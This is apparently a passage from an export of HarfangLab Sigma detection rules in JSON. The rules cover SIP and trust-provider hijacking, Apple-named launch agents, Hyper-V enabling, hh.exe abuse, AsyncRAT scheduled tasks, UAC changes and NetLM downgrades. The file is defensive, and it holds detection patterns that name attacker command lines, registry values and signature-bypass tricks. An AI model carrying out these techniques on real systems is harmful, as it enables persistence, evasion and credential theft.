filter_legitimate_dll:\n Details:\n - 'mso.dll'\n - 'WINTRUST.DLL'\n - 'MSISIP.DLL'\n - '?:\\Program Files\\ReasonLabs\\EPP\\x64\\rsSIPProvider.dll'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\pwrshsip.dll'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pwrshsip.dll'\n - '?:\\Windows\\SysWOW64\\AppxSip.dll'\n - '?:\\Windows\\System32\\AppxSip.dll'\n - '?:\\Windows\\SysWOW64\\wshext.dll'\n - '?:\\Windows\\System32\\wshext.dll'\n - '?:\\Windows\\SysWOW64\\MSISIP.DLL'\n - '?:\\Windows\\System32\\MSISIP.DLL'\n - '?:\\Windows\\SysWOW64\\pwrshsip.dll'\n - '?:\\Windows\\System32\\pwrshsip.dll'\n\n filter_legitimate_funcname:\n Details:\n # Verify Indirect Data\n - 'MsoVBADigSigVerifyIndirectData'\n - 'CryptSIPVerifyIndirectData'\n - 'SIPVerifyIndirectData'\n - 'PsVerifyHash'\n - 'MsiSIPVerifyIndirectData'\n\n # Get Signed Data\n - 'MsoVBADigSigGetSignedDataMsg'\n - 'CryptSIPGetSignedDataMsg'\n - 'SIPGetSignedDataMsg'\n - 'PsGetSignature'\n - 'MsiSIPGetSignedDataMsg'\n\n condition: (\n (selection_dll and not filter_legitimate_dll) or\n (selection_funcname and not filter_legitimate_funcname)\n )\n and selection_filetype # and not 1 of exclusion_*\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2a653231-c597-40e1-b664-2415c9a4a2e4", "rule_name": "SIP or Trust Provider Hijacked via Registry Modification", "rule_description": "Detects modifications to registry keys associated with Windows Subject Interface Packages (SIPs) and Trust Providers, which are used to validate digital signatures and code trust.\nSIPs handle digital signature creation, retrieval, and hash validation for various file formats (PE, PowerShell, MSI, etc.), while Trust Providers perform the actual trust decisions via the WinVerifyTrust API. Attackers with elevated privileges can hijack these components by modifying the Dll or FuncName registry values to point to malicious code or abuse legitimate signed functions (e.g., ntdll!DbgUiContinue) to bypass signature validation. This technique allows unsigned or malicious code to appear legitimately signed, evade security products, bypass application whitelisting solutions like Device Guard, and achieve persistent code execution in processes that perform trust validation.\nInvestigate any modifications to these registry paths by examining the process responsible for the change, validating the referenced DLL against known-good baselines, and checking for indicators of compromise such as non-standard DLLs or function names like DbgUiContinue being used for hash verification.\n", "rule_creation_date": "2026-01-29", "rule_modified_date": "2026-02-17", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1112", "attack.t1553.003" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2a93d0e0-f93d-4c54-a111-ce4c67fdc506", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.616863Z", "creation_date": "2026-03-23T11:45:34.616866Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.616891Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.sentinelone.com/labs/new-macos-malware-xcodespy-targets-xcode-developers-with-eggshell-backdoor/", "https://attack.mitre.org/techniques/T1036/004/", "https://attack.mitre.org/techniques/T1036/005/" ], "name": "t1030_004_susp_plist_masquerading_apple.yml", "content": "title: Suspicious Plist Masquerading Apple Name\nid: 2a93d0e0-f93d-4c54-a111-ce4c67fdc506\ndescription: |\n Detects the creation of a launch daemon or agent impersonating Apple.\n Adversaries may install persistence impersonating Apple in order to bypass simple security controls.\n It is recommended to check the content of the newly created persistence.\nreferences:\n - https://www.sentinelone.com/labs/new-macos-malware-xcodespy-targets-xcode-developers-with-eggshell-backdoor/\n - https://attack.mitre.org/techniques/T1036/004/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.004\n - attack.t1036.005\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Behavior.Masquerading\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_path:\n - Path|contains: # create\n - '/Library/LaunchDaemons/'\n - '/Library/LaunchAgents/'\n - TargetPath|contains: # rename\n - '/Library/LaunchAgents/'\n - '/Library/LaunchDaemons/'\n selection_kind:\n Kind:\n - 'create'\n - 'rename'\n ProcessImage|contains: '?'\n\n selection_name:\n - Path|endswith: 'com.apple.*'\n - TargetPath|endswith: 'com.apple.*'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2a93d0e0-f93d-4c54-a111-ce4c67fdc506", "rule_name": "Suspicious Plist Masquerading Apple Name", "rule_description": "Detects the creation of a launch daemon or agent impersonating Apple.\nAdversaries may install persistence impersonating Apple in order to bypass simple security controls.\nIt is recommended to check the content of the newly created persistence.\n", "rule_creation_date": "2024-06-18", "rule_modified_date": "2025-10-29", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1036.004", "attack.t1036.005" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2aa99981-34d6-4623-8d69-576d9828ba9c", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.626100Z", "creation_date": "2026-03-23T11:45:34.626102Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.626106Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines", "https://attack.mitre.org/techniques/T1564/006/" ], "name": "t1564_006_enable_hyperv.yml", "content": "title: Windows Hyper-V Enabled\nid: 2aa99981-34d6-4623-8d69-576d9828ba9c\ndescription: |\n Detects the activation of Windows Hyper-V virtualization feature.\n This command enables the Hyper-V virtualization platform and its required components on Windows without restarting the system.\n Attackers may enable Hyper-V to hide and run malware inside virtual machines, evading host-based defenses and maintaining persistent.\n It is recommended to investigate the parent process to determine if this action was legitimate.\nreferences:\n - https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\n - https://attack.mitre.org/techniques/T1564/006/\ndate: 2025/11/12\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\Dism.exe'\n - OriginalFileName: 'DISM.EXE'\n\n selection_command:\n CommandLine|contains|all:\n - ' ?online'\n - ' ?enable-feature'\n - ' ?all'\n - ' ?featurename:microsoft-hyper-v'\n - ' ?norestart'\n\n exclusion_docker:\n ParentImage:\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\DockerDesktopInstallers\\\\*\\Docker Desktop Installer.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\chocolatey\\DockerDesktopInstallers\\\\*\\Docker Desktop Installer.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2aa99981-34d6-4623-8d69-576d9828ba9c", "rule_name": "Windows Hyper-V Enabled", "rule_description": "Detects the activation of Windows Hyper-V virtualization feature.\nThis command enables the Hyper-V virtualization platform and its required components on Windows without restarting the system.\nAttackers may enable Hyper-V to hide and run malware inside virtual machines, evading host-based defenses and maintaining persistent.\nIt is recommended to investigate the parent process to determine if this action was legitimate.\n", "rule_creation_date": "2025-11-12", "rule_modified_date": "2025-12-29", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1564.006" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2aaef300-223b-4962-a97a-3b22e67f8221", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.085739Z", "creation_date": "2026-03-23T11:45:34.085741Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.085746Z", "rule_level": "medium", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://lolbas-project.github.io/lolbas/Binaries/Hh/", "https://attack.mitre.org/techniques/T1218/", "https://attack.mitre.org/techniques/T1105/" ], "name": "t1218_hh.yml", "content": "title: Hh.exe Execution\nid: 2aaef300-223b-4962-a97a-3b22e67f8221\ndescription: |\n Detects the execution of hh.exe Windows binary which is used to process chm files on Windows.\n This binary can be abused by attackers to download remote files or execute binaries.\n It is recommended to check for suspicious behavior by the process, such as network connections or child process execution.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Hh/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2021/07/12\nmodified: 2025/11/05\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.command_and_control\n - attack.t1105\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Hh\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\hh.exe'\n - OriginalFileName: 'HH.exe'\n filter_chm:\n CommandLine|endswith:\n - '.chm'\n - '.chm\"'\n\n exclusion_ibm:\n ParentImage:\n - '?:\\Program Files (x86)\\IBM\\Personal Communications\\pcsws.exe'\n - '?:\\Program Files\\Personal Communications\\pcsws.exe'\n\n exclusion_autohotkey:\n ParentImage|endswith: '\\AutoHotkey.exe'\n # C:\\Windows\\hh.exe ms-its:C:\\Program Files\\AutoHotkey\\AutoHotkey.chm::/docs/Welcome.htm\n CommandLine|contains: 'ms-its:*AutoHotkey.chm::/docs/'\n\n exclusion_lenovo:\n CommandLine|contains: '?:\\Program Files (x86)\\Lenovo\\Update Retriever\\'\n\n exclusion_fiduexpert:\n Image|endswith: '\\RF Logiciels\\Fidu-Expert*\\hh.exe'\n ParentImage|endswith: '\\RF Logiciels\\Fidu-Expert*\\FiduExpert.exe'\n\n exclusion_eic:\n # https://www.eic.fr/\n Image: '?:\\EIC\\DR\\Application *\\hh.exe'\n ParentImage: '?:\\EIC\\DR\\Application *\\dr.exe'\n\n exclusion_programfiles:\n ProcessParentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2aaef300-223b-4962-a97a-3b22e67f8221", "rule_name": "Hh.exe Execution", "rule_description": "Detects the execution of hh.exe Windows binary which is used to process chm files on Windows.\nThis binary can be abused by attackers to download remote files or execute binaries.\nIt is recommended to check for suspicious behavior by the process, such as network connections or child process execution.\n", "rule_creation_date": "2021-07-12", "rule_modified_date": "2025-11-05", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1105", "attack.t1218" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2acfef72-9bfe-4583-9f0a-0fdbec088a28", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.622939Z", "creation_date": "2026-03-23T11:45:34.622941Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.622945Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html", "https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/", "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/", "https://attack.mitre.org/techniques/T1053/005/", "https://lolbas-project.github.io/lolbas/Binaries/Schtasks/" ], "name": "t1053_005_asyncrat_scheduled_task.yml", "content": "title: AsyncRAT Scheduled Task Created\nid: 2acfef72-9bfe-4583-9f0a-0fdbec088a28\ndescription: |\n Detects the creation of a scheduled task related to the AsyncRAT hacking tool.\n Attackers often used scheduled task to persistently execute malicious code.\n It is recommended to investigate the parent process performing this action and download the XML file to get the scheduled task action.\nreferences:\n - https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html\n - https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/\n - https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/\n - https://attack.mitre.org/techniques/T1053/005/\n - https://lolbas-project.github.io/lolbas/Binaries/Schtasks/\ndate: 2022/08/22\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Schtasks\n - classification.Windows.HackTool.AsyncRAT\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\schtasks.exe'\n - OriginalFileName: 'schtasks.exe'\n selection_cmd1:\n CommandLine|contains:\n - '/create '\n - '-create '\n - ' create '\n selection_cmd2:\n CommandLine|contains:\n - '/tn '\n - '-tn '\n\n selection_specific_asyncrat_1:\n CommandLine|contains|all:\n - '/sc onlogon /rl highest'\n - '\\AppData\\Roaming\\'\n\n selection_specific_asyncrat_2:\n CommandLine|contains|all:\n - '/sc onlogon /rl highest'\n - '\\AppData\\Local\\Temp\\'\n\n selection_specific_public_directory_1:\n CommandLine|contains|all:\n - '/sc minute /mo'\n - '\\Users\\Public\\'\n\n selection_specific_public_directory_2:\n CommandLine|contains|all:\n - '/Create /XML'\n - '\\Users\\Public\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_psappdeploytoolkit:\n # C:\\WINDOWS\\System32\\schtasks.exe /create /f /tn DeltaManager_2.0.0.2_1.0_2.0.0.2_FR_BlockedApps /xml C:\\Users\\Public\\PSAppDeployToolkit\\SchTaskUnBlockApps.xml\n CommandLine:\n - '* /create /f /tn * /xml*?:\\Users\\Public\\PSAppDeployToolkit\\PSAppDeployToolkit-ExecuteAsUser.xml*'\n - '* /create /f /tn * /xml*?:\\Users\\Public\\PSAppDeployToolkit\\SchTaskUnBlockApps.xml*'\n\n exclusion_wapt:\n ParentImage: '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n\n condition: selection_bin and all of selection_cmd* and 1 of selection_specific_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2acfef72-9bfe-4583-9f0a-0fdbec088a28", "rule_name": "AsyncRAT Scheduled Task Created", "rule_description": "Detects the creation of a scheduled task related to the AsyncRAT hacking tool.\nAttackers often used scheduled task to persistently execute malicious code.\nIt is recommended to investigate the parent process performing this action and download the XML file to get the scheduled task action.\n", "rule_creation_date": "2022-08-22", "rule_modified_date": "2026-03-16", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.execution", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1053.005" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2b08e300-2cbf-4b7f-8b71-d33804657613", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "low", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.622461Z", "creation_date": "2026-03-23T11:45:34.622463Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.622467Z", "rule_level": "low", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/settings-and-configuration", "https://twitter.com/1ZRR4H/status/1575364101148114944", "https://attack.mitre.org/techniques/T1548/" ], "name": "t1548_uac_consent_config_change.yml", "content": "title: UAC Registry Configuration Modified\nid: 2b08e300-2cbf-4b7f-8b71-d33804657613\ndescription: |\n Detects a partial disabling of the UAC consent window in the User Account Control registry configuration.\n Attackers may change this configuration in order to locally elevate privileges quietly or allow future attackers to do so.\n It is recommended to investigate this action to determine its legitimacy.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/settings-and-configuration\n - https://twitter.com/1ZRR4H/status/1575364101148114944\n - https://attack.mitre.org/techniques/T1548/\ndate: 2022/11/03\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n filter_disable:\n Details:\n - 'DWORD (0x00000000)' # This is handled by the rule 189eeb83-5aec-4186-97ea-ad22929a4f15\n - 'DWORD (0x00000005)' # This is the default value\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_device_enroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessParentImage: '?:\\Windows\\system32\\svchost.exe'\n\n exclusion_clickshare:\n ProcessCommandLine|endswith: '\\AppData\\Local\\Temp\\{????????-????-????-????-????????????}\\ClickShareButtonApp-{????????-????-????-????-????????????}.exe'\n # C:\\Windows\\System32\\DriverStore\\FileRepository\\barcoclicksharedrv.inf_amd64_2911b58ce63436e2\\BarcoClickShareSvc.exe\n ProcessGrandparentImage: '?:\\Windows\\System32\\DriverStore\\FileRepository\\barcoclicksharedrv.inf_*\\BarcoClickShareSvc.exe'\n Details: 'DWORD (0x00000002)'\n\n # c6d36742ebd7db317f2740a67c37ec08608f85ecdfa093315823cc37c5cc7d06\n exclusion_clickshare_2:\n ProcessImage: '?:\\ClickShareApp\\ClickShare\\app-?.??.?-???\\clickshare_native.exe'\n\n exclusion_vaudio:\n ProcessImage: '?:\\Program Files (x86)\\Common Files\\VAudio\\Audckq32.exe'\n ProcessParentImage: '?:\\Windows\\system32\\services.exe'\n Details: 'DWORD (0x00000004)'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\n#level: medium\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2b08e300-2cbf-4b7f-8b71-d33804657613", "rule_name": "UAC Registry Configuration Modified", "rule_description": "Detects a partial disabling of the UAC consent window in the User Account Control registry configuration.\nAttackers may change this configuration in order to locally elevate privileges quietly or allow future attackers to do so.\nIt is recommended to investigate this action to determine its legitimacy.\n", "rule_creation_date": "2022-11-03", "rule_modified_date": "2026-03-16", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1548" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2b0a3397-e688-4bb7-ae09-07debeea1a9d", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.089034Z", "creation_date": "2026-03-23T11:45:34.089036Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.089040Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1595/002/" ], "name": "t1595_002_linux_exp_suggester_perl.yml", "content": "title: Linux-Exploit-Suggester Hacktool Executed via Perl\nid: 2b0a3397-e688-4bb7-ae09-07debeea1a9d\ndescription: |\n Detects common commands from linux-exploit-suggester-2.\n linux-exploit-suggester is an open-source Perl script for suggesting privilege escalation exploits on Linux.\n It is recommended to investigate the context of this execution to determine if this is a legitimate action conducted by an administrator to test his systems or if it is part of an attack.\n If so, it is recommended to block the user and isolate the machine for further forensics.\nreferences:\n - https://attack.mitre.org/techniques/T1595/002/\ndate: 2022/11/21\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.reconnaissance\n - attack.t1595.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Script.Perl\n - classification.Linux.HackTool.LinuxExploitSuggester\n - classification.Linux.Behavior.Discovery\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n ParentImage|endswith: '/perl'\n CommandLine: 'sh -c uname -r |cut -d\"-\" -f1'\n condition: selection\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2b0a3397-e688-4bb7-ae09-07debeea1a9d", "rule_name": "Linux-Exploit-Suggester Hacktool Executed via Perl", "rule_description": "Detects common commands from linux-exploit-suggester-2.\nlinux-exploit-suggester is an open-source Perl script for suggesting privilege escalation exploits on Linux.\nIt is recommended to investigate the context of this execution to determine if this is a legitimate action conducted by an administrator to test his systems or if it is part of an attack.\nIf so, it is recommended to block the user and isolate the machine for further forensics.\n", "rule_creation_date": "2022-11-21", "rule_modified_date": "2025-04-14", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [], "rule_technique_tags": [ "attack.t1595.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2b16b989-2088-48a9-a2e4-ff125b31a00e", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.621402Z", "creation_date": "2026-03-23T11:45:34.621404Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.621408Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level", "www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions", "https://attack.mitre.org/techniques/T1562/001/", "https://attack.mitre.org/techniques/T1112/" ], "name": "t1562_001_netlm_downgrade.yml", "content": "title: NetLM Downgraded\nid: 2b16b989-2088-48a9-a2e4-ff125b31a00e\ndescription: |\n Detects the downgrade of the NetLM configuration in the Windows registry.\n The modification of LmCompatibilityLevel registry value to 2 or less disables the use of NTLMv2 session security.\n This weaken the security of network authentications and can be used by attackers to extract the NTLM hash.\n It is recommended to analyze the process responsible for this registry edit as well as for malicious actions in this user session.\nreferences:\n - https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level\n - www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions\n - https://attack.mitre.org/techniques/T1562/001/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2020/11/09\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\LmCompatibilityLevel'\n Details:\n - 'DWORD (0x00000000)'\n - 'DWORD (0x00000001)'\n - 'DWORD (0x00000002)'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s 